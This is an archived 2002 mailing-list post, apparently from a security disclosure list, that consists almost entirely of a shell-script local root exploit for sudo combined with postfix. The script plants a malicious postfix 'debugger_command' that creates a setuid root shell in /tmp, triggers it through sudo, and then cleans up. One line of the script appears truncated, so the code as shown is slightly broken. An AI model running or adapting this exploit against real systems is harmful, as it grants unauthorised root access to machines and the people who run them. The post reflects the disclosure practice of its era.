Sudo +Postfix Exploit

From: Charles 'core' Stevenson (coreat_private)
Date: Tue Jan 15 2002 - 20:44:58 PST

  • Next message: Pavel Kankovsky: "Re: ddd smashed"

    Took a few minutes to write something... hope you like it.
    Best Regards,
    Charles 'core' Stevenson
    # root shell exploit for postfix + sudo
    # tested on debian powerpc unstable
    # by Charles 'core' Stevenson <coreat_private>
    # Put your password here if you're not in the sudoers file
    echo -e "sudo exploit by core <coreat_private>\n"
    echo "Setting up postfix config directory..."
    /bin/cp -r /etc/postfix /tmp
    echo "Adding malicious debugger command..."
    echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/
    echo "Setting up environment..."
    export MAIL_CONFIG=/tmp/postfix
    export MAIL_DEBUG=
    sleep 2
    echo "Trying to exploit..."
    echo -e "$PASSWORD\n"|/usr/bin/sudo su -
    sleep 2
    echo "We should have a root shell let's check..."
    ls -l /tmp/sh
    echo "Cleaning up..."
    rm -rf /tmp/postfix
    echo "Attempting to run root shell..."

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